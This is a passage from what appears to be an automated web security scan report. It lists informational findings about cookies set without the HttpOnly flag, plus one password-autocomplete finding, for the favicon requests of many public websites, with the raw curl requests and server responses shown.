Set-Cookie: BID=lz41VXDuH8Qe3yaFuANwwdc3BoxcSfn9rNCei9TRY0xbrM0XOwjSaO9-SbjUBaNKf_diTAs_bb8iLBHP7ztS; path=/; domain=.ticketmaster.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=NVcfObc34CW8xvG3eaHZhEljjPhSeod21tXLKa8jNojh1fiM0CkpSQ==; path=/

..............h.......(....... ...........@............................wf.....U3".....3.......fUD.D"......wfU...w.........fD3.3.......D...U"..U3..f3".............wUD.wUU..fU...........................
...[SNIP]...
14.196. http://www.totalbeauty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalbeauty.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.totalbeauty.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:28:30 GMT
Last-Modified: Tue, 22 Mar 2011 01:23:28 GMT
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
_onnection: keep-alive
Via: CN-5000
Set-Cookie: cresist=43C93BCA00001F90; path=/
Proxy-Connection: Keep-Alive

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
14.197. http://www.tracfone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tracfone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tracfone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TFWirelessA=R2837728125; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Date: Sat, 02 Apr 2011 13:33:18 GMT
Accept-Ranges: bytes
Content-Length: 1078
Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT
x-wily-servlet: Clear appServerIp=10.248.45.11&agentName=TRAC&servletName=FileServlet&servletResponseTime=0&agentHost=dp-web1&agentProcess=WebLogic
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=166AF1570AF82D0B01733919685DAB4D

...... ..........&...........(.......(... ...@.................................................................................................fffff...........fffff.........fff....fh.......fff....fh.
...[SNIP]...
14.198. http://www.travelocity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelocity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:08 GMT
Server: Apache
Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT
Set-Cookie: tyrg1st=8FE61A00E4F9500A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com
Last-Modified: Tue, 30 Mar 2004 00:21:00 GMT
ETag: "57e"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding
Connection: close
Content-Type: image/x-icon

..............h.......(....... .....................................9......X...[....|...S...........Z.....C...Y....V..Y.....6..U......../...7...*..d*.....Z.....N..h....S.......C.......)..n..f.....t.I.
...[SNIP]...
14.199. http://www.true.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.true.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.true.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 20 Jul 2004 18:39:21 GMT
Accept-Ranges: bytes
ETag: "8012ddf886ec41:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:39 GMT
Content-Length: 894
Set-Cookie: NSC_xxx-mc-hsq=445337273660;path=/;domain=true.com

..............h.......(....... ...............H...H......................................................................................................................0.}%..*..*.(..*..*.|#..P......
...[SNIP]...
14.200. http://www.tvtxtr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvtxtr.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tvtxtr.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 21 Sep 2010 00:48:39 GMT
Accept-Ranges: bytes
ETag: "4e8d62bb2659cb1:0"
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 14:16:49 GMT
Content-Length: 5430
Set-Cookie: BIGipServerpool-173.203.135.154-TVT-WWW=2684463296.20480.0000; path=/

............ .h...&... .... .........(....... ..... .....................................................................................................................i...&g..Jq....D...............
...[SNIP]...
14.201. http://www.uhaul.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uhaul.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uhaul.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Fri, 13 Aug 2010 17:37:08 GMT
Accept-Ranges: bytes
ETag: "3bc28f27e3bcb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=0F8F14C64A2E7D1EA96C289BDA4E02E6; Path=/; Domain=.uhaul.com
Set-Cookie: TLTUID=0F8F14C64A2E7D1EA96C289BDA4E02E6; Path=/; Domain=.uhaul.com; expires=Sat, 02-04-2021 13:57:29 GMT
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:28 GMT
Content-Length: 1438

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...
14.202. http://www.united.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.united.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.united.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8a
Set-Cookie: v1st=DDE5B3A5816CD2D9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.united.com
Last-Modified: Fri, 04 Mar 2011 06:10:29 GMT
Accept-Ranges: bytes
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: fullsite
Set-Cookie: NSC_Vojufe_HSQ=ffffffffd25f668d45525d5f4f58455e445a4a423660;Version=1;path=/;httponly

..............h.......(....... ....................................g.e>.....k....H%.zX....O#...._....=..1..3..g@.Z7.......H..Y4........x..i.=.......`8.,..3..qN.>.........s./..wU....xV..m.vS.......vT
...[SNIP]...
14.203. http://www.usa-people-search.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa-people-search.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usa-people-search.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:53 GMT
Set-Cookie: iqf5cookie=352823488.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
14.204. http://www.veoh.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.veoh.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Set-Cookie: veohCookie="VisitorUID=D44A495F-8033-AE3D-9C5D-F70504C464C9&LastUpdate=02/Apr/2011:06:34:13 -0700&first=0"; domain=.veoh.com; Expires=Wed, 01 Apr 2015 13:34:13 GMT; Path=/
Content-Length: 2550
Date: Sat, 02 Apr 2011 13:34:13 GMT
Last-Modified: Thu, 31 Mar 2011 10:42:18 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: image/x-icon

..............h...&......... .h.......(....... ................................r............J.......J.......v...........J...........b.......F...>...........2.......J.......V...:...F...>......."...>...
...[SNIP]...
14.205. http://www.verisign.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verisign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:34 GMT
Server: Apache
Set-Cookie: v1st=1ECA364D37B527F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e933b-1536-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/html

............ .h...&... .... .........(....... ..... ........................................
xP.dU...E...E...F...]*...b.:.............................{.#U...U....................Y..E...yQ............
...[SNIP]...
14.206. http://www.videobash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videobash.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videobash.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:08 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: is_really_pc=1; expires=Sun, 03-Apr-2011 13:34:08 GMT
Set-Cookie: vbvisit=1; path=/
Connection: close
Content-Type: text/html
Set-Cookie: RNLBSERVERID=ded543; path=/
Content-Length: 37609

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta prop
...[SNIP]...
14.207. http://www.virtualtourist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtualtourist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virtualtourist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Jetty(6.1.14)
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:53:04 GMT
Accept-Ranges: bytes
Set-Cookie: VTT=64.14.197.3.1301752384.816877; Path=/; Domain=.virtualtourist.com
Last-Modified: Tue, 15 Mar 2011 01:29:34 GMT
Content-Length: 708

BM............(...............................c...c...................k[Q.{ka.............V&...B    ..F
..F
..?    ..>    .~8..z6..?...i/..W'..J!..(....I...M...R...T...C...W"..\(..`-.H(...j:..l<..l=..^6..yM...
...[SNIP]...
14.208. http://www.vistaprint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vistaprint.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vistaprint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 28 Dec 2010 18:23:24 GMT
Accept-Ranges: bytes
P3P: CP="VPRT "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Set-Cookie: v1st=CA22C9248E11B2CF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.vistaprint.com

............ .h.......(....... ..... .....@.....................J...M...O...Q...S...U...Y...]..._...^..._...`...b...c...e...i...@...Z..._...e...j...q.......................................d...7...J...
...[SNIP]...
14.209. http://www.wachovia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wachovia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wachovia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:33:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=D2B46F245D2D105D5E8AE140D73CF7D1; Path=/; Domain=.wachovia.com
Location: https://www.wachovia.com/favicon.ico
Vary: Accept-Encoding
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.wachovia.co
...[SNIP]...
14.210. http://www.warnerbros.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.warnerbros.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.warnerbros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:00 GMT
Server: Apache
X-WBOL-WebServer: www_us
Set-cookie: WBWTID=173.193.214.243-4D97255037F000006CE1590-www-wb-web13; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Thu, 27 Mar 2008 22:51:38 GMT
ETag: "6174a9-47e-737b280"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon

............ .h.......(....... ..... ...................................................:...:q..:e..:s..................................................:...:...:^..:...:n..............................
...[SNIP]...
14.211. http://www.webs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: FW_PIN_HASH=R728070988; path=/
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1406-1296536635000"
Last-Modified: Tue, 01 Feb 2011 05:03:55 GMT
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:31:25 GMT

..............h.......(....... .................................#.JLk...............,..A.SSe.....@.7...... .A).. . .:\K. ." .,...'...<&L.+.,.....$6......&C&...........!..........'.."...l... "....
...[SNIP]...
14.212. http://www.wellsfargo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellsfargo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Sat, 02 Apr 2011 12:43:51 GMT
Content-length: 1150
Content-type: image/x-icon
Set-Cookie: v1st=6F0DE9B2A6C80BB2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Last-modified: Thu, 06 Jan 2011 21:04:58 GMT
Etag: "47e-4d262e7a"
Accept-ranges: bytes

............ .h.......(....... ..... .........................&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&.
...[SNIP]...
14.213. http://www.whitepages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitepages.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 12:38:12 GMT
Status: 200 OK
X-Runtime: 0.02908
ETag: "509dbed9826a8b82280d864c43c645da"
Connection: keep-alive
Set-Cookie: search_beta_test_110331=1; domain=.whitepages.com; path=/; expires=Mon, 02 Apr 2012 12:38:12 GMT
Set-Cookie: wp_endemic_provider=C; domain=.whitepages.com; path=/; expires=Sun, 03 Apr 2011 00:38:12 GMT
Set-Cookie: wp_perm=pid%3DEokXfl0mEeCcYwAfKWTiIA; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.whitepages.com; path=/; expires=Sun, 01 Apr 2012 12:38:12 GMT
Set-Cookie: _wpn_sid=dc1ba6490e45f104f1df0d2749bceada; domain=.whitepages.com; path=/
Content-Length: 20020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Free Peo
...[SNIP]...
14.214. http://www.wildgames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wildgames.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wildgames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://www.wildtangent.com/?dp=wildgames
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:21 GMT
Content-Length: 163
Set-Cookie: wgn_persist=553715722.6688.0000; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.wildtangent.com/?dp=wildgames">here</a></body>
14.215. http://www.wirefly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wirefly.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wirefly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 824
Content-Type: image/x-icon
Last-Modified: Thu, 05 Mar 2009 20:20:14 GMT
Accept-Ranges: bytes
ETag: "23deeccacf9dc91:2604"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
P3P: CP="NON DSP COR TAIa OUR IND STA", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:49 GMT
Set-Cookie: BIPcookie=snBNk9ar5ACTycf2Qgftv348PLaqh7aAyO+dcsy7xNS5dzQsxj7mGpR4LDsy9W5g7FRqOXsj; expires=Sat, 02-Apr-2011 13:46:50 GMT; path=/

BM8.......6...(.........................................................................................................................................................................................
...[SNIP]...
14.216. http://www.wsbtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wsbtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wsbtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Jan 2010 20:07:02 GMT
ETag: "111f567-37e-8bfc0580"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=284
Expires: Sat, 02 Apr 2011 13:55:18 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d429400007e2b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

..............h.......(....... ................................T.`...................................J...U..U..T..D.J...............................=...O..T..T..U..U.:.........................5..
...[SNIP]...
14.217. http://www.xe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Set-Cookie: ID=173.193.214.243.1301752224347582; path=/; expires=Fri, 28-Mar-31 13:50:24 GMT
Last-Modified: Fri, 03 Sep 2010 13:21:25 GMT
ETag: "3780f7-f1-ceba7f40"
Accept-Ranges: bytes
Content-Length: 241
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
Connection: close
Content-Type: text/html

<HTML>
<HEAD><TITLE>Autoextraction Prohibited</TITLE></HEAD>
<BODY>
Automated extraction of our content is prohibited. See <A HREF="http://www.xe.com/errors/noautoextract.htm">http://www.xe.com/error
...[SNIP]...
14.218. http://www.yellowpages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:06 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: image/x-icon
Content-Length: 5430
Last-Modified: Fri, 01 Apr 2011 18:42:25 GMT
Expires: Mon, 02 May 2011 12:43:06 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT

............ .h...&... .... .........(....... ..... .........................U..-8...+...'...&...$...!...........!...$...&...'...+...:...Y..*6...(...'...$...................................$...'...(.
...[SNIP]...
14.219. http://www.zillow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zillow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:33 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:36:34 GMT
ETag: W/"22382-1284155361000"
Last-Modified: Fri, 10 Sep 2010 21:49:21 GMT
Content-Length: 22382
Set-Cookie: BIGipServertomcat_pool_0=3423341066.0.0000; path=/
Via: 1.1 www.zillow.com
Vary: User-Agent
Content-Type: image/x-icon
Set-Cookie: BIGipServerapache_pool_0=2601257482.0.0000; path=/

............ .h...6... .... .........@@.... .(B..F...(....... ..... ................................................................................................ ...-..............................
...[SNIP]...
15. Password field with autocomplete enabled  previous  next
There are 4 instances of this issue:

15.1. http://www.collegehumor.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
